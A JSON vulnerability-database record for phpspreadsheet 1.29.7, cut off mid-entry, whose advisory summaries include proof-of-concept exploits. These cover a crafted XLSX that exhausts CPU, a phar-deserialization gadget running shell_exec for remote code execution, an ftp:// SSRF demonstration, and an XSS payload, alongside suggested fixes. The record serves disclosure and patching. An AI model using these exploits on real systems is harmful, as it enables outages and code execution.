{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","type":"composer","namespace":"phpoffice","name":"phpspreadsheet","version":"1.29.7","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.30.4","latest_non_vulnerable_version":"5.7.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90253?format=json","vulnerability_id":"VCID-dzsc-krs5-kkhp","summary":"PhpSpreadsheet has CPU Denial of Service via Unbounded Row Number in XLSX Row Dimensions\n## Summary\n\nThe XLSX reader's `ColumnAndRowAttributes::readRowAttributes()` method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a minimal XLSX file (~1.6KB) containing a `<row r=\"999999999\"/>` element that inflates `cachedHighestRow` to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources.\n\n## Details\n\nIn `src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php` at line 216, the row index is cast directly from XML without bounds checking:\n\n```php\n// ColumnAndRowAttributes.php:216\n$rowIndex = (int) $row['r'];  // No validation against AddressRange::MAX_ROW\n```\n\nThis value flows through `setRowAttributes()` (line 126) → `$this->worksheet->getRowDimension($rowNumber)` (line 60), which updates the cached highest row in `Worksheet.php:1348`:\n\n```php\n// Worksheet.php:1342-1349\npublic function getRowDimension(int $row): RowDimension\n{\n    if (!isset($this->rowDimensions[$row])) {\n        $this->rowDimensions[$row] = new RowDimension($row);\n        $this->cachedHighestRow = max($this->cachedHighestRow, $row);\n    }\n    return $this->rowDimensions[$row];\n}\n```\n\nThe inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in `RowIterator::resetEnd()` (RowIterator.php:86):\n\n```php\n// RowIterator.php:86\n$this->endRow = $endRow ?: $this->subject->getHighestRow();\n```\n\nNotably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks.\n\n## PoC\n\n**Step 1: Create the malicious XLSX file (~1.6KB)**\n\n```python\nimport zipfile\nimport io\n\ncontent_types = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"><Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/><Default Extension=\"xml\" ContentType=\"application/xml\"/><Override PartName=\"/xl/workbook.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml\"/><Override PartName=\"/xl/worksheets/sheet1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml\"/></Types>'\n\nrels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument\" Target=\"xl/workbook.xml\"/></Relationships>'\n\nworkbook = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><workbook xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\" xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\"><sheets><sheet name=\"Sheet1\" sheetId=\"1\" r:id=\"rId1\"/></sheets></workbook>'\n\nwb_rels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet\" Target=\"worksheets/sheet1.xml\"/></Relationships>'\n\nsheet = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><worksheet xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"><sheetData><row r=\"1\"><c r=\"A1\"><v>1</v></c></row><row r=\"999999999\" ht=\"15\"/></sheetData></worksheet>'\n\nwith zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf:\n    zf.writestr('[Content_Types].xml', content_types)\n    zf.writestr('_rels/.rels', rels)\n    zf.writestr('xl/workbook.xml', workbook)\n    zf.writestr('xl/_rels/workbook.xml.rels', wb_rels)\n    zf.writestr('xl/worksheets/sheet1.xml', sheet)\n\nprint(\"Created dos_row.xlsx\")\n```\n\n**Step 2: Load with PhpSpreadsheet (CPU exhaustion)**\n\n```php\n<?php\nrequire 'vendor/autoload.php';\n\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\n$reader = IOFactory::createReader('Xlsx');\n$spreadsheet = $reader->load('dos_row.xlsx');\n$sheet = $spreadsheet->getActiveSheet();\n\necho \"Highest row: \" . $sheet->getHighestRow() . \"\\n\";\n// Output: Highest row: 999999999\n\n// This will consume CPU for ~144 seconds (999M iterations)\nforeach ($sheet->getRowIterator() as $row) {\n    // CPU exhaustion\n}\n```\n\n**Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely.\n\n## Impact\n\n- **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. Estimated CPU burn is ~144 seconds per file.\n- **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory.\n- **Amplification:** The ratio of input size to resource consumption is extreme — 1,580 bytes triggers nearly 1 billion iterations.\n- **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely.\n\n## Recommended Fix\n\nAdd row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161:\n\n```php\n// src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216\n// Before:\n$rowIndex = (int) $row['r'];\n\n// After:\n$rowIndex = (int) $row['r'];\nif ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) {\n    continue;\n}\n```\n\nThe `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 161.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40902","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17525","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17629","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17623","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.1759","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.1751","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40902"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-7c6m-4442-2x6m","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T12:11:26Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-7c6m-4442-2x6m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40902","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40902"},{"reference_url":"https://github.com/advisories/GHSA-7c6m-4442-2x6m","reference_id":"GHSA-7c6m-4442-2x6m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7c6m-4442-2x6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-40902","GHSA-7c6m-4442-2x6m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzsc-krs5-kkhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89504?format=json","vulnerability_id":"VCID-g5n6-3aer-gkgd","summary":"PhpSpreadsheet has SSRF/RCE in IOFactory::load when $filename is user controlled\nThe usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`.\nThe 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below.\n\nThis results in a SSRF, at \"best\", and RCE at worse.\n\nThis was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`).\n\n## PoC\nTo reproduce the vulnerable behavior, the following scripts were used:\n\n`php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library:\n```ini\nphar.readonly=0\n```\n\n`make_phar.php` to create the malicious file:\n```php\n<?php\n// php -c php.ini make_phar.php\nclass GadgetClass {\n    public $data;\n    function __construct($d) {\n        $this->data = $d;\n    }\n    function __destruct() {\n        shell_exec($this->data);\n    }\n}\n\n$pop = new GadgetClass('touch /tmp/poc.txt');\n\n$phar = new Phar('exploit.phar');\n$phar->startBuffering();\n$phar->setStub('<?php __HALT_COMPILER(); ?>');\n$phar->addFromString('whatever', 'dummy content');\n$phar->setMetadata($pop);\n$phar->stopBuffering();\n\nrename('exploit.phar', 'exploit.xlsx'); // optional\necho \"exploit.xlsx created \\n\";\n\n```\n\n`test.php` showcases the unsafe pattern:\n```php\n<?php\nrequire 'vendor/autoload.php';\n\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\nclass GadgetClass {\n    public $data;\n    function __construct($d) {\n        $this->data = $d;\n    }\n    function __destruct() {\n        shell_exec($this->data);\n    }\n}\n\n$filename = $argv[1] ?? null;\n\nif (!$filename) {\n    echo \"Usage: php test.php <path>\\n\";\n    echo \"  e.g. php test.php phar://exploit.xlsx/whatever\\n\";\n    exit(1);\n}\n\necho \"Calling IOFactory::load('\" . $filename . \"')\\n\";\n\ntry {\n    $spreadsheet = IOFactory::load($filename);\n    var_dump($spreadsheet);\n} catch (Throwable $e) {\n    echo \"Vuln has still triggered even if exception triggers.\\n\";\n}\n\n\n```\n### RCE \nRun the PoC (for RCE):\n```bash\nphp -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt\n```\nThe file `/tmp/poc.txt` should now be present on disk.\n> Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could \"silently\" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. \n\n### SSRF\nRun the PoC (for SSRF):\n```bash\nncat -lvp 21 #run on another terminal\nphp test.php ftp://127.0.0.1:21/test\n```\n\nObserve a connection is made to `127.0.0.1` on port `21`.\n\n\n\n## Root Cause Analysis \n\nFollowing the API exposed by the library, using `IOFactory::load`, the code proceeds as follows:\n```php\nIOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) ->  File::assertFile($filename, ...) -> is_file($filename);\n```\n\n\nThe one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create \"POP\" gadget chains via other classes which may be available in real-world deployment scenarios.\n\n```php\n    public function __destruct()\n    {\n        // Unlink temporary files\n        // There is nothing reasonable to do if unlink fails.\n        if ($this->tempFileName != '') {\n            @unlink($this->tempFileName);\n        }\n    }\n\n    /** @param mixed[] $data */\n    public function __unserialize(array $data): void\n    {\n        $this->tempFileName = '';\n\n        throw new SpreadsheetException('Unserialize not permitted');\n    }\n```\n\nPhpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts.\n\n## Suggested mitigations\n\nUse `is_file` only after making sure the filename does not contain any php wrapper:\n```php\n$scheme = parse_url($filename, PHP_URL_SCHEME);\n// strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\\...), Windows quirks :)\n// since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge\nif ($scheme !== null && strlen($scheme) > 1) {\n    throw new \\PhpOffice\\PhpSpreadsheet\\Exception(\n        \"Stream wrappers are not permitted as file paths: {$filename}\"\n    );\n}\n```\n\nor perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly:\n```php\n$real = realpath($filename); // not php wrapper aware AFAIK\nif ($real === false) {\n    throw new \\PhpOffice\\PhpSpreadsheet\\Exception(\"Invalid file path: {$filename}\");\n}\n\n// from here on, $real should be a clean absolute path so we can pass it to is_file()\nif (!is_file($real)) {\n    throw new ...\n}\n```\n\n> Note: `stream_is_local()` would also not be safe here — as it considers `phar://` to be local and would not block it.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34084","reference_id":"","reference_type":"","scores":[{"value":"0.00226","scoring_system":"epss","scoring_elements":"0.45444","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.47812","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.478","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.4783","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.47847","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34084"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q4q6-r8wh-5cgh","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T19:32:56Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q4q6-r8wh-5cgh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34084","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34084"},{"reference_url":"https://www.php.net/manual/en/wrappers.php","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.php.net/manual/en/wrappers.php"},{"reference_url":"https://github.com/advisories/GHSA-q4q6-r8wh-5cgh","reference_id":"GHSA-q4q6-r8wh-5cgh","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q4q6-r8wh-5cgh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110708?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.3"},{"url":"http://public2.vulnerablecode.io/api/packages/110707?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.15"},{"url":"http://public2.vulnerablecode.io/api/packages/110706?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110704?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110703?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.6.0"}],"aliases":["CVE-2026-34084","GHSA-q4q6-r8wh-5cgh"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g5n6-3aer-gkgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89404?format=json","vulnerability_id":"VCID-jw3b-hm9c-sbd2","summary":"PhpSpreadsheet has XSS via NumberFormat @ Text Substitution in HTML Writer\n### Summary\nThe HTML Writer in PhpSpreadsheet bypasses `htmlspecialchars()` output escaping when a cell uses a custom number format containing the `@` text placeholder with additional literal text (e.g., `@ \"items\"` or `\"Total: \"@`). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file.\n\n### Details\n\n\n#### 1. Conditional escaping in `Html.php:1586-1594`\n\n```php\n$cellData = NumberFormat::toFormattedString(\n    $origData2,\n    $formatCode ?? NumberFormat::FORMAT_GENERAL,\n    [$this, 'formatColor']\n);\n\nif ($cellData === $origData) {\n    $cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags());\n}\n```\n\n`htmlspecialchars()` is only called when `$cellData === $origData` (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely.\n\n#### 2. Early return in `Formatter.php:136-152`\n\n```php\nif (preg_match(self::SECTION_SPLIT, $format) === 0\n    && preg_match(self::SYMBOL_AT, $formatx) === 1) {\n    if (!str_contains($format, '\"')) {\n        return str_replace('@', /* raw value */, $format);\n    }\n    return str_replace(/* ... preg_replace with raw value ... */);\n}\n```\n\nWhen the format code contains `@` with additional literal text (e.g., `@ \"items\"`), the formatter substitutes the raw cell value into the format string and **returns early** — the `formatColor` callback (which would have applied `htmlspecialchars`) is never invoked.\n\n\n### PoC\n\n**test.php**\n``` php\n<?php\n\nrequire '/app/vendor/autoload.php';\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Html;\n\n$spreadsheet = new Spreadsheet();\n$sheet = $spreadsheet->getActiveSheet();\n\n$payload    = '<img src=x onerror=alert(document.domain)>';\n$formatCode = '@ \"items\"';\n\n\n$sheet->setCellValue('A1', $payload);\n$sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode);\n\n$writer = new Html($spreadsheet);\n$html = $writer->generateHTMLAll();\n\nfile_put_contents('/app/output.html', $html);\n\necho \"HTML output saved to /app/output.html\\n\";\n```\n\nThe produced output contains unescaped data.\n``` html\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n  <head>\n      <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n      <meta name=\"generator\" content=\"PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet\" />\n      <title>Untitled Spreadsheet</title>\n      <meta name=\"author\" content=\"Unknown Creator\" />\n      <meta name=\"title\" content=\"Untitled Spreadsheet\" />\n      <meta name=\"lastModifiedBy\" content=\"Unknown Creator\" />\n      <meta name=\"created\" content=\"2026-04-02T16:34:44+00:00\" />\n      <meta name=\"modified\" content=\"2026-04-02T16:34:44+00:00\" />\n    <style type=\"text/css\">\n[..SNIP..]\n    </style>\n  </head>\n\n  <body>\n<div style='page: page0'>\n    <table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'>\n        <col class=\"col0\" />\n        <tbody>\n          <tr class=\"row0\">\n            <td class=\"column0 style1 s\"><img src=x onerror=alert(document.domain)> items</td>\n          </tr>\n    </tbody></table>\n</div>\n  </body>\n</html>\n```\n\n<img width=\"719\" height=\"716\" alt=\"Screenshot 2026-04-02 at 18 45 53\" src=\"https://github.com/user-attachments/assets/b758b063-a2d1-4e76-87bb-931eae81dbfe\" />\n\n\n\n### Impact\n\nThe impact changes based on the way the HTML is served. \nIn case it is served from the web server it is typical XSS, in case the file is downloaded and opened locally, the attack vector is more limited.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35453","reference_id":"","reference_type":"","scores":[{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01246","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.0167","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01674","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01683","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01682","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35453"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6wpp-88cp-7q68","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:27:23Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6wpp-88cp-7q68"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35453","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35453"},{"reference_url":"https://github.com/advisories/GHSA-6wpp-88cp-7q68","reference_id":"GHSA-6wpp-88cp-7q68","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6wpp-88cp-7q68"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-35453","GHSA-6wpp-88cp-7q68"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jw3b-hm9c-sbd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89275?format=json","vulnerability_id":"VCID-qz8g-w1uw-c7bb","summary":"PhpSpreadsheet has XSS via number format code with @ text placeholder bypasses htmlspecialchars in HTML writer\nIt was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes.\n\n## The Problem\n\nIn `Writer/Html.php` around line 1592, the code checks if the formatted cell data 